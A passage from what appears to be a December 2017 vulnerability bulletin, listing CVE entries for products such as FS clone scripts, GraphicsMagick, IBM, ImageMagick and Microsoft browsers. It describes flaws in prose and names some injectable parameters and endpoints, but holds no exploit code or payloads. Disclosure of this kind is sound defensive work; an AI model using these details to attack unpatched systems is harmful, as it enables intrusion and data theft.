 		FS Quibids Clone 1.0 has SQL Injection via the itechd.php productid parameter.2017-12-13not yet calculatedCVE-2017-17581
MISC
fs -- shutterstock_clone
 		FS Shutterstock Clone 1.0 has SQL Injection via the /Category keywords parameter.2017-12-13not yet calculatedCVE-2017-17583
MISC
fs -- stackoverflow_clone
 		FS Stackoverflow Clone 1.0 has SQL Injection via the /question keywords parameter.2017-12-13not yet calculatedCVE-2017-17590
MISC
fs -- thumbtack_clone
 		FS Thumbtack Clone 1.0 has SQL Injection via the browse-category.php cat parameter or the browse-scategory.php sc parameter.2017-12-13not yet calculatedCVE-2017-17589
MISC
fs -- trademe_clone
 		FS Trademe Clone 1.0 has SQL Injection via the search_item.php search parameter or the general_item_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17577
MISC
geomview -- geomview
 		common/help.c in Geomview 1.9.5 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17530
MISC
gnu_global -- gnu_global
 		gozilla.c in GNU GLOBAL 4.8.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17531
MISC
graphicsmagick -- graphicsmagick
 		ReadRGBImage in coders/rgb.c in GraphicsMagick 1.3.26 has a magick/import.c ImportRGBQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17500
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 		WriteOnePNGImage in coders/png.c in GraphicsMagick 1.3.26 has a heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17501
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 		ReadCMYKImage in coders/cmyk.c in GraphicsMagick 1.3.26 has a magick/import.c ImportCMYKQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17502
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 		ReadGRAYImage in coders/gray.c in GraphicsMagick 1.3.26 has a magick/import.c ImportGrayQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17503
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 		WritePNMImage in coders/pnm.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (bit_stream.c MagickBitStreamMSBWrite heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file.2017-12-10not yet calculatedCVE-2017-17498
CONFIRM
BID
CONFIRM
harbor -- harbor
 		The Ping() function in ui/api/target.go in Harbor through 1.3.0-rc4 has SSRF via the endpoint parameter to /api/targets/ping.2017-12-15not yet calculatedCVE-2017-17697
MISC
hdf5 -- hdf5
 		In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5T_conv_struct_opt in H5Tconv.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17507
MISC
hdf5 -- hdf5
 		In HDF5 1.10.1, there is a NULL pointer dereference in the function H5O_pline_decode in the H5Opline.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17505
MISC
hdf5 -- hdf5
 		In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5Opline_pline_decode in H5Opline.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17506
MISC
hdf5 -- hdf5
 		In HDF5 1.10.1, there is an out of bounds write vulnerability in the function H5G__ent_decode_vec in H5Gcache.c in libhdf5.a. For example, h5dump would crash or possibly have unspecified other impact someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17509
MISC
hdf5 -- hdf5
 		In HDF5 1.10.1, there is a divide-by-zero vulnerability in the function H5T_set_loc in the H5T.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17508
MISC
huawei -- multiple_products
 		Huawei EC156, EC176, and EC177 USB Modem products with software before UTPS-V200R003B015D02SP07C1014 (23.015.02.07.1014) and before V200R003B015D02SP08C1014 (23.015.02.08.1014) use a weak ACL for the "Mobile Partner" directory, which allows remote attackers to gain SYSTEM privileges by compromising a low privilege account and modifying Mobile Partner.exe.2017-12-11not yet calculatedCVE-2014-8358
CONFIRM
BID
MISC

ibm -- connections_engagement_center

IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005.2017-12-11not yet calculatedCVE-2017-1683
CONFIRM
BID
MISC
ibm -- connections
 		IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954.2017-12-11not yet calculatedCVE-2017-1613
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 4.07, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130915.2017-12-13not yet calculatedCVE-2017-1546
CONFIRM
BID
MISC
ibm -- financial_transaction_manager_for_multi-platform
 		IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) 3.0.0.0 through 3.0.0.7 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 132926.2017-12-11not yet calculatedCVE-2017-1606
CONFIRM
BID
MISC
ibm -- inotes
 		IBM iNotes is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.2017-12-13not yet calculatedCVE-2017-1421
CONFIRM
BID
SECTRACK
MISC
ibm -- jazz_foundation_products
 		IBM Jazz Foundation Products could disclose sensitive information during a scan that could lead to further attacks against the system. IBM X-Force ID: 129619.2017-12-11not yet calculatedCVE-2017-1507
CONFIRM
MISC
ibm -- maximo_asset_management
 		IBM Maximo Asset Management 7.5 and 7.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 131548.2017-12-13not yet calculatedCVE-2017-1558
CONFIRM
MISC
ibm -- sterling_file_gateway
 		IBM Sterling File Gateway 2.2 could allow an authenticated user to change other user's passwords. IBM X-Force ID: 131290.2017-12-11not yet calculatedCVE-2017-1550
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 		IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131289.2017-12-11not yet calculatedCVE-2017-1549
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 		IBM Sterling File Gateway 2.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 131288.2017-12-11not yet calculatedCVE-2017-1548
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 		IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 133178.2017-12-11not yet calculatedCVE-2017-1632
CONFIRM
BID
MISC
ibm -- support_tools_for_lotus_wcm
 		IBM Support Tools for Lotus WCM (IBM WebSphere Portal 7.0, 8.0, 8.5 and 9.0) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130733.2017-12-11not yet calculatedCVE-2017-1536
CONFIRM
BID
MISC
ibm -- tivoli_monitoring
 		IBM Tivoli Monitoring V6 6.2.2.x could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free error. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 133243.2017-12-13not yet calculatedCVE-2017-1635
CONFIRM
BID
MISC
ibm -- tivoli_workload_scheduler
 		IBM Tivoli Workload Scheduler 8.6.0, 9.1.0, and 9.2.0 could disclose sensitive information to a local attacker due to improper permission settings. IBM X-Force ID: 134638.2017-12-13not yet calculatedCVE-2017-1716
CONFIRM
BID
MISC
ibm -- websphere_mq
 		IBM WebSphere MQ 7.5, 8.0, and 9.0 could allow a local user to crash the queue manager agent thread and expose some sensitive information. IBM X-Force ID: 126454.2017-12-11not yet calculatedCVE-2017-1760
CONFIRM
MISC
icu -- international_components_for_unicode_for_c/c++
 		The ucnv_UTF8FromUTF8 function in ucnv_u8.cpp in International Components for Unicode (ICU) for C/C++ through 60.1 mishandles ucnv_convertEx calls for UTF-8 to UTF-8 conversion, which allows remote attackers to cause a denial of service (stack-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted string, as demonstrated by ZNC.2017-12-10not yet calculatedCVE-2017-17484
MISC
MISC
MISC
MISC
MISC
MISC
idevicerestore -- idevicerestore
 		The socket_create function in socket.c in idevicerestore through 2017-12-10 allows remote attackers to bypass intended access restrictions and communicate with services on iOS devices by connecting to an IPv4 TCP socket, a similar issue to CVE-2016-5104.2017-12-10not yet calculatedCVE-2017-17496
MISC
imagemagick -- imagemagick
 		In ImageMagick 7.0.7-12 Q16, a large loop vulnerability was found in the function ExtractPostscript in coders/wpg.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted wpg image file that triggers a ReadWPGImage call.2017-12-14not yet calculatedCVE-2017-17682
CONFIRM
imagemagick -- imagemagick
 		ImageMagick before 7.0.7-12 has a coders/png.c Magick_png_read_raw_profile heap-based buffer over-read via a crafted file, related to ReadOneMNGImage.2017-12-10not yet calculatedCVE-2017-17504
CONFIRM
imagemagick -- imagemagick
 		In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadXPMImage in coders/xpm.c, which allows attackers to cause a denial of service via a crafted xpm image file.2017-12-14not yet calculatedCVE-2017-17680
CONFIRM
imagemagick -- imagemagick
 		In ImageMagick 7.0.7-12 Q16, an infinite loop vulnerability was found in the function ReadPSDChannelZip in coders/psd.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted psd image file.2017-12-14not yet calculatedCVE-2017-17681
CONFIRM
imagemagick -- imagemagick
 		ImageMagick before 6.9.9-24 and 7.x before 7.0.7-12 has a use-after-free in Magick::Image::read in Magick++/lib/Image.cpp.2017-12-10not yet calculatedCVE-2017-17499
BID
CONFIRM
CONFIRM
CONFIRM
intel -- graphics_driver
 		Type Confusion in Content Protection HECI Service in Intel Graphics Driver allows unprivileged user to elevate privileges via local access.2017-12-12not yet calculatedCVE-2017-5717
CONFIRM
k7 -- antivirus_15.1.0309
 		K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025a4 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17700
MISC
k7 -- antivirus_15.1.0309
 		K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025c8 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17701
MISC
k7 -- antivirus_15.1.0309
 		K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025ac DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17699
MISC
kaspersky -- embedded_systems_security
 		Kernel pool memory corruption in one of drivers in Kaspersky Embedded Systems Security version 1.2.0.300 leads to local privilege escalation.2017-12-08not yet calculatedCVE-2017-12823
BID
CONFIRM
kildclient -- kildclient
 		KildClient 3.1.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to prefs.c and worldgui.c.2017-12-14not yet calculatedCVE-2017-17511
MISC
kiwi -- kiwi
 		examples/framework/news/news3.py in Kiwi 1.9.22 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17532
MISC
landesk -- management_suite
 		In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted Direct Object Reference leads to referencing/updating objects belonging to other users. In other words, a normal user can send requests to a specific URI with the target user's username in an HTTP payload in order to retrieve a key/token and use it to access/update objects belonging to other users. Such objects could be user profiles, tickets, incidents, etc.2017-12-11not yet calculatedCVE-2017-11463
MISC
legion_of_the_bouncy_castle -- bouncycastle_tls
 		BouncyCastle TLS prior to version 1.0.3, when configured to use the JCE (Java Cryptography Extension) for cryptographic functions, provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable application. This vulnerability is referred to as "ROBOT."2017-12-12not yet calculatedCVE-2017-13098
CERT-VN
BID
CONFIRM
MISC
lib/ecstatic.js -- lib/ecstatic.js
 		A regular expression Denial of Service (DoS) vulnerability in the file lib/ecstatic.js of the ecstatic npm package, before version 2.0.0, allows a remote attacker to overload and crash a server by passing a maliciously crafted string.2017-12-14not yet calculatedCVE-2016-10703
MISC
MISC
lilypond -- lilypond
 		lilypond-invoke-editor in LilyPond 2.19.80 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument.2017-12-11not yet calculatedCVE-2017-17523
MISC
MISC
MISC
linux -- kernel
 		The usb_destroy_configuration function in drivers/usb/core/config.c in the USB core subsystem in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources, which allows local users to cause a denial of service (out-of-bounds write access) or possibly have unspecified other impact via a crafted USB device.2017-12-12not yet calculatedCVE-2017-17558
MISC
MISC
linux -- kernel
 		The raw_sendmsg() function in net/ipv4/raw.c in the Linux kernel through 4.14.6 has a race condition in inet->hdrincl that leads to uninitialized stack pointer usage; this allows a local user to execute code and gain privileges.2017-12-15not yet calculatedCVE-2017-17712
CONFIRM
CONFIRM
linux -- kernel
 		The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.2017-12-11not yet calculatedCVE-2017-1000407
MLIST
BID
CONFIRM
MLIST
maplesoft -- maple_t.a.
 		A Reflected XSS Vulnerability affects the forgotten password page of Maplesoft Maple T.A. 2016.0.6 (Customer Hosted) via the emailAddress parameter to passwordreset/PasswordReset.do, aka Open Bug Bounty ID OBB-286688.2017-12-16not yet calculatedCVE-2017-14134
MISC
mathias_kettner -- check_mk
 		A cross site scripting (XSS) vulnerability exists in Check_MK versions 1.2.8x prior to 1.2.8p25 and 1.4.0x prior to 1.4.0p9, allowing an unauthenticated attacker to inject arbitrary HTML or JavaScript via the output_format parameter, and the username parameter of failed HTTP basic authentication attempts, which is returned unencoded in an internal server error page.2017-12-11not yet calculatedCVE-2017-11507
CONFIRM
MISC
mckesson_medical_imaging_company -- conserus_image_repository_archive_solution
 		A security researcher found an XML External Entity (XXE) vulnerability on the Conserus Image Repository archive solution version 2.1.1.105 by McKesson Medical Imaging Company, which is now a Change Healthcare company. An unauthenticated user supplying a modified HTTP SOAP request to the vulnerable service allows for arbitrary file read access to the local file system as well as the transmittal of the application service's account hashed credentials to a remote attacker.2017-12-15not yet calculatedCVE-2017-14101
MISC
mckesson_medical_imaging_company -- conserus_workflow_intelligence_application
 		Security researchers discovered an authentication bypass vulnerability in version 2.0.2 of the Conserus Workflow Intelligence application by McKesson Medical Imaging Company, which is now a Change Healthcare company. The attacker must send a malicious HTTP GET request to exploit the vulnerability. The vulnerability allows an attacker to bypass authentication and escalate privileges of valid users. An unauthenticated attacker can exploit the vulnerability and be granted limited access to other accounts. An authenticated attacker can exploit the vulnerability and be granted access reserved for higher privilege users.2017-12-15not yet calculatedCVE-2017-16776
MISC
meinberg -- lantime_devicesDirectory traversal vulnerability in the "Upload Groupkey" functionality in the Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with Admin-User access to write to arbitrary files and consequently gain root privileges by uploading a file, as demonstrated by storing a file in the cron.d directory.2017-12-15not yet calculatedCVE-2017-16788
FULLDISC
meinberg -- lantime_devices
 		The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with certain privileges to read arbitrary files via (1) the ntpclientcounterlogfile parameter to cgi-bin/mainv2 or (2) vectors involving curl support of the "file" schema in the firmware update functionality.2017-12-15not yet calculatedCVE-2017-16787
FULLDISC
FULLDISC
mensis -- mensis
 		uiutil.c in Mensis 0.0.080507 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17521.2017-12-14not yet calculatedCVE-2017-17534
MISC
metview -- metview
 		etc/ObjectList in Metview 4.7.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17515
MISC
micro_focus -- project_and_portfolio_management_center
 		Man-In-The-Middle vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Man-in-the-middle attack.2017-12-12not yet calculatedCVE-2017-14361
CONFIRM
micro_focus -- project_and_portfolio_management_center
 		Cross-Site Request Forgery vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Cross-Site Forgery attack.2017-12-12not yet calculatedCVE-2017-14362
CONFIRM
microsoft -- chakracore
 		ChakraCore allows an attacker to execute arbitrary code in the context of the current user, due to how the ChakraCore scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11916
BID
CONFIRM

microsoft -- device_guard

Device Guard in Windows 10 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows a security feature bypass vulnerability due to the way untrusted files are handled, aka "Microsoft Windows Security Feature Bypass Vulnerability".2017-12-12not yet calculatedCVE-2017-11899
BID
SECTRACK
CONFIRM
microsoft -- exchance_server
 		Microsoft Exchange Server 2016 CU5 and Microsoft Exchange Server 2016 CU5 allow a spoofing vulnerability due to the way Outlook Web Access (OWA) validates web requests, aka "Microsoft Exchange Spoofing Vulnerability".2017-12-12not yet calculatedCVE-2017-11932
BID
SECTRACK
CONFIRM

microsoft -- internet_explorer

Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handle objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11906 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11887
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 		Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11901
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 		Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11903
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 		Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11913
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 		Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11907
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 		Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11906
BID
SECTRACK
CONFIRM
microsoft -- malware_protection_engine
 		The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, 1709 and Windows Server 2016, Windows Server, version 1709, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to remote code execution. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability". This is different than CVE-2017-11937.2017-12-08not yet calculatedCVE-2017-11940
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Microsoft Edge handles objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability".2017-12-12not yet calculatedCVE-2017-11888
BID
SECTRACK
CONFIRM
microsoft -- multiple_productsChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11912
BID
SECTRACK
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11893
BID
SECTRACK
CONFIRM
microsoft -- multiple_productsChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11918
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and and Internet Explorer adn Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11894
BID
SECTRACK
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11895
BID
SECTRACK
SECTRACK
CONFIRM
microsoft -- multiple_productsChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11911
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

